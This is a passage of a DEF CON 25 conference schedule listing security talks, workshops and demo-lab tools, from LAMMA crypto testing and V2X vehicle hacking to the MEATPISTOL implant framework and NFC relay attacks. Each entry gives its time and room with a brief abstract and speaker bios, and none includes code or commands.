Last year we released LAMMA Beta at DEF CON; this year we are bringing the updated version of LAMMA, with new modules for blockchain security testing, auditing trust stores, and enhanced checks for source code analysis and logical flaws in crypto coding. LAMMA 1.0, with new features and fixes, makes crypto testing more effective and smoother even for large-scale implementations. You can use and enhance LAMMA 1.0, as it is free and open source.

http://www.securitymonx.com/products/lamma

Antriksh Shah
Antriksh is a security researcher from Goa. He is associated with the null Open Security community and organizes Nullcon. His areas of interest are VAPT, web app security, network auditing and forensics. Currently his research is focused on security issues in blockchain implementations, and he has contributed his work to enhance LAMMA.

Ajit Hatti
Ajit Hatti has been contributing to the secure usage of cryptography for the past 5 years and is currently focusing on the security issues of blockchain-related technologies. He is the author of the LAMMA and GibberSense tools, which help in securing crypto and PKI implementations.

Ajit is the founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded the null Open Security Community and has worked with Symantec, Emerson, ZScaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at Black Hat and the DEF CON Crypto & Privacy Village, and organizes Nullcon in India. He loves to run and volunteer at BSides LV, and organizes The World Run by Hackers.



Wireless - Florentine BR I & II - Promenade Level - Saturday - 15:00-15:55


Alexander Zakharov

Bio

Alexander has over 25 years of experience in the Telecommunications, Information Technology and IT Security fields. He was responsible for the creation and deployment of solutions protecting networks, systems and information assets for a large number of organizations in both the private and public sectors. Alexander also managed numerous projects in the areas of Internet technologies, system integration, distributed computing, embedded designs, and wired and wireless data and voice communications. He earned a Master of Science in Mechanics with majors in Robotics, Cybernetics and Automated Control Systems, and holds the following key professional certifications in the IT Security field: CISSP, ISSAP, CAP, CEH, CISA, CISM, CRISC, PI, COBIT, EMCDSA, and ITIL.

@alftelsystems

Large Scale Wireless Monitoring - KISMET packet sniffer on a multi-radio array

Abstract

This presentation will walk the audience through, and explain, recently developed Kismet features that greatly benefit setups with multiple radio cards. Support for multiple devices allows smarter splitting of work across them, including separate discovery and tracking activities, as well as dedicating certain radios to targeted bands and channel ranges. The coming Kismet release (currently under development, slated to be released shortly) has new and very flexible configuration options for using multiple sources of radio data during passive scanning and tracking. The live presentation will use an ALFTEL Systems Ltd. Airbud appliance with an 8-radio-card setup and the latest Kismet sniffer software.



Night Life - Counsel Boardroom, Promenade Level - Saturday - 18:00-19:00


Title:
Lawyer Meetup

Attention all lawyers, law students, and judges: The DEF CON Lawyer Meetup is BACK! We'll be meeting Saturday the 29th at 6pm in the Counsel Boardroom on the Promenade Level. Join us for conversation and merriment, followed by dinner for those interested in extending the experience.

See you there!

PHV - Milano VIII - Promenade Level - Friday - 16:10-16:59


Layer 8 and Why People are the Most Important Security Tool

Damon Small, Technical Director, Security Consulting at NCC Group North America

People are the cause of many security problems, but people are also the most effective resource for combating them. Technology is critical, but without trained professionals it is ineffective. In the context of two case studies, the presenter will describe specific instances where human creativity and skill overcame technical deficiencies. The presenter believes this topic to be particularly relevant for the Packet Hacking Village, as many of the techniques used are the same ones that are pertinent to Capture the Packet and Packet Detective.

Technical details will include the specific tools used, screenshots of captured data, and analysis of the malware and the malicious user's activity. The goal of the presentation is to show the importance of technical ability and critical thinking, and to demonstrate that skilled people are the most important tool in an information security program.

Damon Small (Twitter: @damonsmall) began his career studying music at Louisiana State University. Pursuing the changing job market, he took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid 1990s. Following the dotcom bust in the early 2000s, Small began focusing on cyber security. This has remained his passion, and over the past 17 years as a security professional he has supported infosec initiatives in the healthcare, defense, and oil and gas industries. In addition to his Bachelor of Arts in Music, Small completed the Master of Science in Information Assurance degree from Norwich University in 2005. As Technical Director for NCC Group, Small has a particular interest in research and business development in the Healthcare and Oil and Gas industries. His role also includes working closely with NCC consultants and clients in delivering complex security assessments that meet varied business requirements.



SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 10:00-10:59


Title:
Lessons From An Incident Responder AKA, Stories Of When Shit Goes Sideways

1000 Saturday
John Ives

With nearly 20 years in IT, and over 13 of them in security on an open academic network, I have seen many things go wrong. While most issues are run-of-the-mill events, there have been a number of times when things have gone horribly wrong. This talk will use several true anecdotes (though names and locations may be altered) that highlight issues that are rarely anticipated, and will cover all stages of the IR process. As a bonus, you may also hear other tales of disaster, like difficult e-discovery requirements and maybe even a tale of 0-day mismanagement.


Demolabs - Table 4 - Sunday - 10:00-11:50


Leviathan Framework

Utku Sen

Ozge Barbaros

Sunday from 1000-1150 at Table Four

Audience: Red teamers, penetration testers (Offensive)

Leviathan is a mass audit toolkit with wide-range service discovery, brute force, SQL injection detection and custom exploit execution capabilities. It consists of open source tools such as masscan, ncrack and dsss, and gives you the flexibility of using them in combination.

The main goal of this project is auditing as many systems as possible, country-wide or across a wide IP range.

GitHub page: https://github.com/leviathan-framework/leviathan
A blog post about its custom exploit feature: https://www.utkusen.com/blog/wide-range-detection-of-doublepulsar-implants-with-leviathan.html

Utku Sen
Utku Sen is a security engineer working for Sony. He is the author of ransomware honeypot projects such as Hidden Tear and EDA2, which were featured in Forbes and Business Insider. Utku is mostly focused on the following areas: web application security, network security, tool development and bug hunting. He was also nominated for a Pwnie Award in the "Best Backdoor" category in 2016.

Ozge Barbaros
Ozge Barbaros is a security tools senior developer at Sony. Previously, she worked as GNU/Linux system administrator and as software developer at several companies in Turkey and studied Computer Engineering at Canakkale Onsekiz Mart University. She is interested in developing free software technologies.



Workshops - ( Sold Out ) - Octavius 1 - Friday - 10:30-14:30


Linux Lockdown: ModSecurity and AppArmor

Friday, 10:30 to 14:30 in Octavius 1

Jay Beale Co-Founder and COO, InGuardians

Taught by Bastille Linux creator Jay Beale, this hands-on workshop will teach you to use AppArmor to contain an attack on any program running on the system and to use ModSecurity to protect a web application from compromise. You will be given a vulnerable command line program and a vulnerable web application to protect, via a virtual machine that you can download beforehand. You will first compromise the application, then build up a defense and attempt your attack again. This workshop is being taught for the first time and provides two topics from the long-running Black Hat class, "Aikido on the Command Line."

Prerequisites: Students should bring a working understanding of Linux.

Materials: Students should bring a laptop with VMware Player, Fusion or Workstation, with at least 8GB of RAM. The host operating system must be 64-bit. Students should also download the virtual machines and confirm that they run before the class begins.

Max students: 30 | Registration: https://dc25_beale.eventbrite.com (Sold out!)

Jay Beale
Jay Beale has created several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the "Stealing the Network" series. He has been invited to speak at and chair conferences around the world. Jay is a founder and the Chief Operating Officer of the information security consulting company InGuardians.



CHV - Village Talks Outside Contest Area, Pool Level - Saturday - 15:00-15:59


Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles

No description available



DEFCON - Track 3 - Saturday - 14:00-14:45


Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles

Saturday at 14:00 in Track 3

45 minutes | Demo, Tool

p3n3troot0r (Duncan Woodbury) Hacker

ginsback (Nicholas Haltmeyer) Hacker

Vehicle-to-vehicle (V2V) and, more generally, vehicle-to-everything (V2X) wireless communications enable semi-autonomous driving via the exchange of state information between a network of connected vehicles and infrastructure units. Following 10+ years of standards development, particularly of IEEE 802.11p and the IEEE 1609 family, a lack of available implementations has prevented the involvement of the security community in development and testing of these standards. Analysis of the WAVE/DSRC protocols in their existing form reveals the presence of vulnerabilities which have the potential to render the protocol unfit for use in safety-critical systems. We present a complete Linux-stack based implementation of IEEE 802.11p and IEEE 1609.3/4 which provide a means for hackers and academics to participate in the engineering of secure standards for intelligent transportation systems.

p3n3troot0r (Duncan Woodbury)
Car hacker by trade, embedded systems security engineer by day. Entered the field of cyberauto security in 2012 through the Battelle CAVE red team and had the opportunity to improve the world by hacking transportation systems. Co-founded multiple security companies focused on building tools for automated exploitation of automotive systems (http://www.silent-cyber.com/), open-source frameworks for V2X, secure digital asset management, and 3D printing electric cars (https://hackaday.com/tag/lost-pla/) out of your garage (http://fosscar.faikvm.com/trac/). DEF CON lurker since the age of 17, recently having joined forces with friends and mentors to organize and host the DEF CON Car Hacking Village.

p3n3troot0r began working on V2X with ginsback two years ago and realized the opportunity, in the absence of any open-source or full-stack V2X implementation, to bring the security community into the driver's seat in the development of next-gen cyberauto standards. Together they have engaged the thought leaders in this space, and via the long-awaited integration of this stack into the mainline Linux kernel, the global development community is given the opportunity to participate in the development of automated and connected transportation systems.

ginsback (Nicholas Haltmeyer)
AI researcher and security professional. Began work in automotive security through the DEF CON Car Hacking Village and have since developed V2X software and routing schemes. Extensive experience in signal processing and RF hacking, including vital sign monitoring, activity recognition, and biometric identification through RF.

Given the (abyssal) state of automotive cybersecurity, ginsback aims to develop and field tools for V2X that open collaboration with the hacker community. As intelligent transit reaches critical mass, attacks on V2X infrastructure have the potential to cause incredible damage. ginsback partnered with p3n3troot0r to develop a free as in freedom V2X interface and extend an invitation for the community to discover and fix flaws in the design of what will soon be a massive network of connected vehicles.



DEFCON - Track 1 - Friday - 10:00-10:30


macOS/iOS Kernel Debugging and Heap Feng Shui

Friday at 10:00 in 101 Track

20 minutes

Min(Spark) Zheng Security Expert @ Alibaba Inc. Ph.D of CUHK.

Xiangyu Liu Security Engineer @ Alibaba Inc. Ph.D of CUHK.

Kernel bugs are always very difficult to reproduce and may lead to a panic and restart of the entire system. In practice, kernel debugging is the only way to analyze panic scenes. However, implementing such a technique in the real world is not an easy task, since kernel code cannot be executed in a debugger and is thus hard to track. Luckily, macOS provides a very powerful kernel debugging mechanism, the KDK (Kernel Debug Kit), to help people analyze and develop kernel exploits. For iOS, although there is no official kernel debugger, it is also possible to achieve kernel debugging by leveraging some tricks.

In this talk, we will share some kernel debugging techniques and their corresponding tricks on the latest iOS/macOS. In addition, we will introduce the new kernel heap mitigation mechanisms on iOS 10/macOS 10.12 and two heap feng shui techniques to bypass them. Finally, we will demonstrate how to debug a concrete kernel heap overflow bug and then leverage our new heap feng shui techniques to gain arbitrary kernel memory read/write on iOS 10.2/macOS 10.12.

Min(Spark) Zheng
Min(Spark) Zheng, Security Expert @ Alibaba Inc. Ph.D of CUHK.

Xiangyu Liu
Xiangyu Liu, Security Engineer @ Alibaba Inc. Ph.D of CUHK.



PHV - Milano VIII - Promenade Level - Saturday - 10:10-10:59


Make Your Own 802.11ac Monitoring Hacker Gadget

Vivek Ramachandran, Founder of Pentester Academy and SecurityTube.net
Thomas d'Otreppe, Author of Aircrack-ng

802.11ac networks present a significant challenge for scalable packet sniffing and analysis. With projected speeds in the Gigabit range, USB Wi-Fi card based solutions are now obsolete! In this workshop, we will look at how to build a custom monitoring solution for 802.11ac using off the shelf access points and open source software. Our "Hacker Gadget" will address 802.11ac monitoring challenges such as channel bonding, DFS channels, spatial streams and high throughput data rates. We will also look different techniques to do live streaming analysis of 802.11 packets and derive security insights from it!

Vivek Ramachandran (Twitter: @securitytube) is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking, conceptualized enterprise Wi-Fi Backdoors, created Chellam - the world's first Wi-Fi Firewall and Chigula - a Wi-Fi data mining and IDS framework. He is also the author of multiple five star rated books which have together sold over 13,000+ copies worldwide and have been translated to multiple languages. Vivek started SecurityTube.net in 2007, a YouTube for security which current aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. Vivek's work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada etc. places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, Defcon, Hacktivity, Brucon, Mundo Hacker Day and others.

Thomas d'Otreppe (Twitter: @aircrackng) is a wireless security researcher and author of Aircrack-ng, the most popular and complete suite of tools for WiFi network security assessments. He also created OpenWIPS-ng, an open source Wireless Intrusion Prevention System. Thomas is a contributor to the WiFi stack and toolset in Backtrack Linux, which has now become Kali Linux, the de facto top-choice Linux distribution for penetration testing and vulnerability assessment across multiple technology domains. He is also known as the author of a proactive wireless security course which has been delivered to large numbers of IT Security professionals worldwide. Thomas speaks and teaches in the Americas and Europe and is a well-known speaker at DefCon, BlackHat, DerbyCon, SharkFest, Mundo Hacker Day, BruCON and other venues.



DEFCON - Track 3 - Sunday - 13:00-13:45


Malicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs

Sunday at 13:00 in Track 3

45 minutes | Art of Defense

Thomas Mathew, OpenDNS (Cisco)

Dhia Mahjoub, Head of Security Research, Cisco Umbrella (OpenDNS)

Prior research detailing the relationship between malware, bulletproof hosting, and SSL gave researchers methods to investigate SSL data only when given a set of seed domains. We present a novel statistical technique that allows us to discover botnet and bulletproof hosting IP space by examining SSL distribution patterns in open source data while working with limited or no seed information. This work can be accomplished using open source datasets and data tools.

SSL data obtained from scanning the entire IPv4 address space can be represented as a series of 4-million-node bipartite graphs in which a common name is connected to an IP, CIDR or ASN by an edge. We use the concept of relative entropy to create a pairwise distance metric between any two common names and any two ASNs. The metric allows us to generalize the concept of regular and anomalous SSL distribution patterns.

Relative entropy is useful in identifying domains that have anomalous network structures. The domains we found in this case were related to the Zbot proxy network. The Zbot proxy network has a structure similar to popular CDNs such as Akamai and Google, but instead relies on compromised devices to relay its data. By layering these SSL signals with passive DNS data we create a pipeline that can extract Zbot domains with high accuracy.

Thomas Mathew
Thomas Mathew is a Security Researcher at OpenDNS (now part of Cisco), where he works on implementing pattern recognition algorithms to classify malware and botnets. His main interest lies in using various time series techniques on network sensor data to identify malicious threats. Previously, Thomas was a researcher at UC Santa Cruz and the US Naval Postgraduate School, and a Product and Test Engineer at hands-free streaming video camera company Looxcie, Inc. He has presented at ISOI APT, BruCon, FloCon and Kaspersky SAS.

Dhia Mahjoub
Dr. Dhia Mahjoub is the Head of Security Research at Cisco Umbrella (OpenDNS). He leads the core research team focused on large scale threat detection and threat intelligence and advises on R&D strategy. Dhia has a background in networks and security, has co-authored patents with OpenDNS and holds a PhD in graph algorithms applied to Wireless Sensor Network problems. He regularly works with prospects and customers and speaks at conferences worldwide including Black Hat, Defcon, Virus Bulletin, BotConf, ShmooCon, FloCon, Kaspersky SAS, Infosecurity Europe, RSA, Usenix Enigma, ACSC, NCSC, and Les Assises de la sécurité.



Demolabs - Table 5 - Saturday - 10:00-11:50


Maltego "Have I been pwned?"

Christian Heinrich

Saturday from 1000-1150 at Table Five

Audience: Defense

"Have I been pwned?" allows you to search across multiple data breaches to see if your email addresses or aliases have been compromised in breaches such as those of LinkedIn, Tumblr, etc.

Maltego is a link analysis application for technical infrastructure and/or social media networks drawn from disparate sources of Open Source INTelligence (OSINT). Maltego is listed in the Top 10 Security Tools for Kali Linux by Network World and the Top 125 Network Security Tools by the Nmap Project.

The integration of "Have I been pwned?" with Maltego visualises these breaches in an easy to understand graph format that can be enriched with other sources.

https://github.com/cmlh/Maltego-haveibeenpwned

Christian Heinrich
Christian Heinrich has presented at the OWASP Conferences in Australia, Europe and the USA and at OWASP Chapters in the Netherlands, London, and Sydney and Melbourne, Australia, as well as ToorCon (USA), Shmoocon (USA), BlackHat (Asia and USA), SecTor (Canada), CONFidence (Europe), Hack In The Box (Europe), SyScan (Singapore), B-Sides (Australia), RUXCON (Australia), and AusCERT (Australia).



Workshops - ( Sold Out ) - Octavius 1 - Thursday - 14:30-18:30


Malware Triage: Malscripts Are The New Exploit Kit

Thursday, 14:30 to 18:30 in Octavius 1

Sergei Frankoff, Co-Founder, Open Analysis

Sean Wilson, Co-Founder, Open Analysis

Malware triage, the process of quickly analyzing potentially malicious files or URLs to determine whether your organization has exposure, is an important function in any mature incident response program. Traditionally malware triage has focused on exploit kits, which were the initial infection vector of choice, but this is changing. In recent years malscripts and file-based exploits have become an equally common initial infection vector. Often delivered via email, malscripts can take many different forms: WScript, JavaScript, or embedded macros. However, the goal is always the same: obtain code execution and deliver a malicious payload.

In this workshop you will work through the triage of a live malscript sample. During this process you will identify and extract malscripts from Office documents, manually deobfuscate the malscripts, circumvent anti-analysis techniques, and finally determine the purpose of the scripts and payload in order to develop countermeasures. The focus of this process will be the intersection between the techniques used to analyze malscripts and the larger incident response process.

This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who are interested in learning more about the malware triage process. If you have no experience with malware analysis but you have a good understanding of scripting languages like VBScript and JavaScript, and you are familiar with Windows internals, you should have no problem completing the workshop. Please make sure to bring a laptop that you are able to analyze malware on (we recommend using a VM). We also recommend that you have Google Chrome installed; no other tools need to be installed prior to the workshop.

Prerequisites: None

Materials: Students must bring a laptop that they are able to analyze malware on. We strongly recommend a VM with all anti-virus software disabled.

Max students: 35 | Registration: https://dc25_frankof.eventbrite.com (Sold out!)

Sergei Frankoff
Sergei is a co-founder of Open Analysis and volunteers as a malware researcher. When he is not reverse engineering malware, Sergei is focused on building automation tools for malware analysis. Sergei is a strong believer in taking an open, community approach to combating cyber crime. He actively contributes to open source tools and tries to publish as much analysis as possible. With almost a decade of experience, Sergei has held roles both as the manager of an incident response team and as a malware researcher.

Twitter: @herrcore
GitHub: https://github.com/herrcore and https://github.com/OALabs
Video Tutorials: https://vimeo.com/album/4455336

Sean Wilson
Sean is a co-founder of Open Analysis, and volunteers as a malware researcher. He splits his time between reverse engineering malware and building automation tools for incident response. He is an active contributor to open source security tools focused on incident response and analysis. Sean brings over a decade of experience working in a number of incident response and application security roles with a focus on security testing and threat modelling. In his free time Sean loves fly fishing.

Twitter: @seanmw
GitHub: https://github.com/idiom and https://github.com/OALabs
Video Tutorials: https://vimeo.com/album/4561104



DEFCON - Track 3 - Sunday - 14:00-14:45


Man in the NFC

Sunday at 14:00 in Track 3

45 minutes | Demo, Tool

Haoqi Shan, Wireless security researcher

Jian Yuan, Wireless security researcher

NFC (Near Field Communication) technology is now widely used in security, banking, payment and personal information exchange, and is highly developed. Correspondingly, attack methods against NFC keep emerging. To address this problem, we built a hardware tool which we call "UniProxy". The tool consists of two self-modified high frequency card readers and two radio transmitters, arranged in a master-slave configuration. The master part lets people easily and reliably read almost any ISO 14443A type card (whatever kind of card it is: bank card, ID card, passport, access card, or otherwise, and whatever security protocol it uses, as long as it meets the ISO 14443A standard), while the slave part replays this card to the corresponding legitimate card reader to achieve our "evil" goals. The master and slave communicate via the radio transmitters and can be 50 to 200 meters apart.

Haoqi Shan
Haoqi Shan is currently a wireless/hardware security researcher in the UnicornTeam of 360 Radio Security Research Dept. He focuses on Wi-Fi penetration, GSM systems, embedded device hacking, building hacking tools, etc. He has given a series of presentations on femtocell hacking, RFID hacking and LTE device hacking at DEF CON, CanSecWest, SyScan360, HITB, etc.

Jian Yuan
Yuan Jian is a security researcher in UnicornTeam of 360 Radio Security Research Dept. He is mainly focused on the security of Internet of things, NFC, GPS, etc. He was a speaker at the DEF CON Car Hacking Village.


Contributor Acknowledgement:

The Speakers would like to acknowledge Yuan Jian for his contribution to the presentation.



IOT - Main Contest Area - Saturday - 17:40-18:30


Manufacturers Panel

No description available



DEFCON - Track 3 - Friday - 17:00-17:45


MEATPISTOL, A Modular Malware Implant Framework

Friday at 17:00 in Track 3

45 minutes | Demo, Tool

FuzzyNop (Josh Schwartz), Director of Offensive Security @ Salesforce

ceyx (John Cramb), Hacker

Attention Red Teamers, Penetration Testers, and Offensive Security Operators, isn't the overhead of fighting attribution, spinning up infrastructure, and having to constantly re-write malware an absolute pain and timesink!?! It was for us too, so we're fixing that for good (well, maybe for evil). Join us for the public unveiling and open source release of our latest project, MEATPISTOL, a modular malware framework for implant creation, infrastructure automation, and shell interaction. This framework is designed to meet the needs of offensive security operators requiring rapid configuration and creation of long lived malware implants and associated command and control infrastructure. Say goodbye to writing janky one-off malware and say hello to building upon a framework designed to support efficient yoloscoped adversarial campaigns against capable targets.

FuzzyNop (Josh Schwartz) & ceyx (John Cramb)
FuzzyNop and ceyx were raised by computerized wolves with a penchant for fine art and rum based cocktails. While technically from different mothers and also sides of the world, they formed the first cyber wolf brothership shell-bent to ameliorate the state of targeted malware implants to support the ongoing war against the institutionalized mediocrity of the corporate shadow government. Working in tandem with dolphin researchers funded by the oligarch llamas they have found a way to synthesize powdered ethanol into mechanical pony fuel. Leading Offensive Security functions at Salesforce is merely a front to confuse the saurian overlords of their true purpose yet to be revealed...



BHV - Pisa Room - Saturday - 11:30-11:59


Title: Microscopes are Stupid

Speaker: Louis Auguste

About Louis:
Lou Auguste is an entrepreneur in residence at the NYU Tandon incubator, Future Labs. He is passionate about microscopes, global health and creating jobs. His company Alexapath is at the forefront of AI-based diagnostics and has collected awards from the ASME, Qualcomm, Singularity U, the Indian government, the British government and the US government.

Abstract:
Why can't microscopes diagnose disease? What if they could? For the past four years our team from the NYU Tandon School of Engineering has been building an IoT system capable of turning a standard microscope into a digital imaging tool. The goal is to connect every laboratory in the world into a global network.

We call our device the Auto Diagnostic Assistant, or ADA, in honor of Ada Lovelace, who likely died from undiagnosed cervical cancer. We think the biohacking village will enjoy learning about ADA because it is an extremely low-cost microscope accessory capable of accomplishing tasks that previously required whole slide imaging devices. Perfect for biohackers looking to save, share, study and analyse images of specimens from their microscope.

Our team comprises hardware engineers, software devs and machine learning computer scientists, and our mission is to make diagnosis faster and easier. We have validated the accuracy of our mWSIs (mobile Whole Slide Images) with a pre-clinical study and presented our research as a poster at USCAP (United States and Canada Anatomical Pathology Conference). Additionally, we published our original methods for creating digital slides in the British Medical Journal (though the secret sauce has changed since then).

The hardware prototype of ADA won an award for best hardware led social innovation from the ASME in 2015. Currently, we are launching our beta trial in India with the support of the US Department of State and the Indian Department of Science and Technology. We are actively looking for beta testers in the US as well and would be happy to provide one unit for free to a visitor or member of the biohacking village.




DEFCON - Track 1 - Saturday - 11:00-11:30


Microservices and FaaS for Offensive Security

Saturday at 11:00 in 101 Track

20 minutes | Demo

Ryan Baxendale

More and more cloud service providers are offering serverless or Function-as-a-Service (FaaS) platforms for quickly deploying and scaling applications without the need for dedicated server instances and the overhead of system administration. This technical talk will cover the basic concepts of microservices and FaaS, and how to use them to scale time-consuming offensive security testing tasks. Attacks that were previously considered impractical due to time and resource constraints can now be considered feasible with the availability of cloud services and the never-ending free flow of public IP addresses to avoid attribution and blacklists.

Key takeaways include a guide to scaling your tools and a demonstration of the practical benefits of utilising cloud services for performing undetected port scans, opportunistic attacks against short-lived network services, brute-force attacks on services and OTP values, creating your own whois database and your own Shodan/Censys, and searching for the elusive internet-accessible IPv6 hosts.

Ryan Baxendale
Ryan Baxendale works as a penetration tester in Singapore, where he leads a team of professional hackers. While his days are filled mainly with web and mobile penetration tests, he is more interested in developing security tools, discovering IPv6 networks, and mining the internet for targeted low-hanging fruit. He has previously spoken at XCon in Beijing on automating network pivoting and pillaging with an Armitage script, and has spoken at OWASP chapter and Null Security group meetings. https://www.linkedin.com/in/ryanbaxendale

@ryancancomputer
https://github.com/ryanbaxendale



BHV - Pisa Room - Sunday - 11:30-11:59


Title: Might as well name it Parmigiana, American, Cheddar, and Swiss

Speaker: Ken Belva

About Ken Belva:
Kenneth F. Belva has had a distinguished career in cyber security for almost 20 years. His many roles have included managing a financial services cyber security program audited by the State and Fed, finding 0-days in major software, getting a US Patent on automated XSS exploitation techniques, as well as frequently speaking at many cyber security groups in NYC. He can be found on LinkedIn and on Twitter at @infosecmaverick.

Abstract:
PACS (picture archiving and communication system) is used in health care to store, retrieve, manage, distribute and present medical images. Such images are classified as PII, as they are confidential patient data, usually x-rays along with a physician's patient notes. This talk will illustrate vulnerabilities in a PACS system. Note: potential surprises.




Workshops - ( Sold Out ) - Octavius 6 - Friday - 10:30-14:30


Mobile App Attack 2.0

Friday, 10:30 to 14:30 in Octavius 6

Sneha Rajguru, Security Consultant, Payatu Software Labs LLP

Mobile apps are the most preferred way of delivering attacks today. Understanding the finer details of mobile app attacks is fast becoming an essential skill for penetration testers as well as for app developers and testers.

So, if you are an Android or iOS user, a developer, a security analyst, a mobile pen-tester or just a mobile security enthusiast, then 'Mobile App Attack 2.0' is of definite interest to you. The workshop familiarizes attendees with an in-depth technical explanation of some of the most notorious mobile (Android and iOS) vulnerabilities and ways to verify and exploit them, along with various Android and iOS application analysis techniques and inbuilt security schemes, and teaches how to bypass those security models on both platforms.

With live demos using intentionally crafted real-world vulnerable Android and iOS apps built by the author, we shall look into some of the common ways in which malicious apps bypass security mechanisms or misuse the permissions they are granted.

Apart from that, we shall take a brief look at what is special about the latest Android 7 and iOS 10 security and the related flaws.

Prerequisites: The participants are expected to have a basic knowledge of Mobile Operating Systems. Knowledge of programming languages (Java and C, and Python for scripting) will be an added advantage to grasp things quickly.

Materials: Hardware Requirements
Minimum 4GB RAM and more than 20 GB free hard disk space
Android device (>= 2.3)
iPhone/iPad (>= 7.1.2)
(preferably rooted/jailbroken)

Software Requirements
Windows 7/8
*Nix
Mac OS X 10.5
Administrative privileges on your machine
Virtualbox or VMPlayer
SSH Client
Xcode 6 or higher
ADB
Android Studio 1.3 or higher
Android SDK

Max students: 25 | Registration: https://dc25_rajguru.eventbrite.com (Sold out!)

Sneha Rajguru
Sneha works as a Senior Security Consultant with Payatu Technologies Pvt. Ltd. and holds C.E.H and E.C.S.A certifications. Her area of interest lies in web application and mobile application security and fuzzing. She has discovered various serious application flaws within open source applications such as PDFLite, Jobberbase, Lucidchart and more. She is also an active member of Null, the open security community in India, and a contributor to regular meetups at the Pune chapter. She has spoken and provided training at GNUnify, FUDCon, Defcamp #6, DEF CON 24, BSidesLV and Nullcon 2017.



DEFCON - Track 1 - Saturday - 15:00-15:45


MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt)

Saturday at 15:00 in 101 Track

45 minutes | Demo, Tool

Chris Thompson, Red Team Ops Lead, IBM X-Force Red

Windows Defender Advanced Threat Protection will soon be available for all Blue Teams to utilize within Windows 10 Enterprise, which includes detection of post breach tools, tactics and techniques commonly used by Red Teams, as well as behavior analytics. Combined with Microsoft Advanced Threat Analytics for user behavior analytics across the Domain, Red Teamers will soon face a significantly more challenging time maintaining stealth while performing internal recon, lateral movement, and privilege escalation in Windows 10/Active Directory environments.

This talk highlights the challenges that Microsoft's new tools pose to red teams using common hacking tools/techniques, and covers techniques which can be used to bypass, disable, or avoid high-severity alerts within Windows Defender ATP and Microsoft ATA, as well as TTPs used against mature organizations that may have additional controls in place such as Event Log Forwarding and Sysmon.

Chris Thompson
Chris is Red Team Operations Lead at IBM X-Force Red. He has extensive experience performing penetration testing and red teaming for clients in a wide variety of industries. He's led red teaming operations against defense contractors and some of North America's largest banks.

He's on the board for CREST USA (crest-approved.org), working to help mature the pentesting industry. Chris also teaches Network & Mobile Pentesting at one of Canada's largest technical schools.

Hacking his way through life, Chris likes to pretend he's a good drone pilot, lock picker, and mountain biker.

Twitter: @retBandit



BHV - Pisa Room - Friday - 11:30-11:59


Title: My dog is a hacker and will steal your data!

Speaker: Rafael Fontes Souza


About Rafael:
Rafael Fontes Souza aka b4ckd00r is a Senior Information Security Consultant at CIPHER. He is a core member of Cipher Intelligence Labs, the advanced security team focused on penetration testing, application security and computer forensics for premier clients. He started studying at age 13 and since then has disclosed security vulnerabilities and has received recognition and awards from major companies such as Apple, Microsoft, ESET, HP and others. He has performed hundreds of successful penetration tests for various organizations, including the government, banking and commercial sectors, as well as the payment card industry.

Abstract:
This presentation is about a creative approach to intrusion tests. As the popular saying goes, "The dog is man's best friend" (he makes you feel good and secure). Let's explore the vulnerability of layer eight, the human being, subject to error and to social engineering techniques. This is an innovative method, with art and style, and simpler than it sounds: the dog is used as an attack tool, carrying a mobile phone hidden in its chest collar.
The attack vectors are triggered automatically without any human interaction. These may include geographically close attacks, such as fake Wi-Fi access points, cellular base stations or local user attacks on a network; we can exploit DNS hijacking, packet injection, Evil-Twin, rogue router or ISP, and many other variants. Furthermore, the target connects to your rogue Wi-Fi access point, and the rules enabled through the DHCP configuration allow the fake AP to allocate IP addresses to the clients and forward traffic to a fake/malicious website. The information can then be stored easily, as can the injection of a malicious file to remotely control the victim.
And it's done. You can drop your hacker dog in a park and expect him to hack people for you, quietly. That's perfect!




Demolabs - Table 1 - Saturday - 14:00-15:50


Mycroft

Joshua Montgomery

Saturday from 1400-1550 at Table One

Audience: Hardware, IoT, Automotive, AI, Everyone

Mycroft is an open source virtual assistant similar to Siri or Amazon Alexa. The technology stack allows developers to include a voice interface in anything from a Raspberry Pi to a Jaguar FTYPE sports car.

Mycroft integrates Speech-To-Text, Natural Language Processing, a Skill Framework and a Speech To Text engine into a single, easy to deploy software stack.

Though the technology runs anywhere, the company has developed a Raspberry Pi image (Pi-Croft) and recently deployed a GNOME Shell extension. The company also has a hardware device, the "Mark I", that comes pre-loaded with the software and includes a variety of I/O options for directly controlling devices.

http://mycroft.ai/

Joshua Montgomery
Mycroft is a team effort, but the presenter is likely to be Joshua Montgomery. Joshua is a three-time entrepreneur and Air Force officer. A graduate of the University of Kansas, Joshua founded Wicked Broadband, a gigabit fiber-to-the-home ISP in Lawrence, KS. As the owner of an ISP Joshua has been an advocate for shared networks, common carriage and net neutrality. He has been featured in Wired, Forbes and Ars Technica and has been instrumental in advocating for municipal broadband in his home state of Kansas.

Joshua started the Mycroft project because he wanted to deploy the Star Trek computer in his makerspace. He recruited a talented team of developers, ran a highly successful Kickstarter, was invited to join Techstars in 2016 and is an alum of 500 Startups.

In his capacity as an Air Force officer Joshua serves with the 177 IAS out of Wichita, Kansas. His unit is responsible for providing threat replication for the Department of Defense.



Night Life - Track 4 - Thursday - 18:30-20:30


Title:
n00b Party hosted by Duo Security.

Come to the DC101 Panel, Thursday, Track 1, 16:00 to 17:45 to find out more about this awesome event. All are welcome, but DEF CON "n00bs" are especially encouraged to attend. If you're new to attending DEF CON and are looking to make some connections then this is your party. Music, free swag giveaways, and more!

BHV - Pisa Room - Sunday - 13:30-13:59


Title: Neuro Ethics

